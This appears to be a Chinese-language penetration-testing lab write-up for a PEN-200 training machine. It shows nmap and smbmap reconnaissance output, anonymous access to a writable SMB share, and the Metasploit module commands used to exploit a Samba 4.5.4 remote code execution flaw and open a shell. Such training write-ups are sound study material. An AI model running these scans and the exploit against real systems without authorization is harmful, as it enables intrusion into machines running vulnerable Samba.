pen200-lab 学习笔记

【pen200-lab】10.11.1.146

🔥系列专栏：pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月27日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

文章目录

• pen200-lab 学习笔记
• • 信息收集

信息收集

 nmap -p- --min-rate 10000 -A  10.11.1.146
22/tcp  open  ssh         OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e373a948819d90bc7075818a3de8956f (RSA)
|   256 0e7622d020ca1e96e97ba59a86e7f6d4 (ECDSA)
|_  256 57e1e406a3796d03536cd67b67ed86dc (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.4-Ubuntu (workgroup: WORKGROUP)

看起来主要是139以及445的业务
smbmap -H 10.11.1.146

[+] Guest session       IP: 10.11.1.146:445     Name: unknown                                           Disk                                                    PermissionsComment----                                                    ------------------print$                                                  NO ACCESS  Printer DriversSusieShare                                              READ, WRITEYOUR COMMENTSIPC$                              

SusieShare能够读写
smbclient -N //10.11.1.146/SusieShare

但是这是个空的文件

接着我会回头看
ssh的版本，没有问题
smb的似乎有点问题

samba smbd 4.5.4 exploit github

搜索
发现存在rce,号称linux永恒之蓝
用msf一把梭

use exploit/linux/samba/is_known_pipename
set rhoat[靶机ip]
run
shell
id

不用msf的方法尝试了很久没有成功，不过网上也有很多教程
这里不赘述了，这个lab的点就是samba的利用。只要能发现版本的问题，就能成功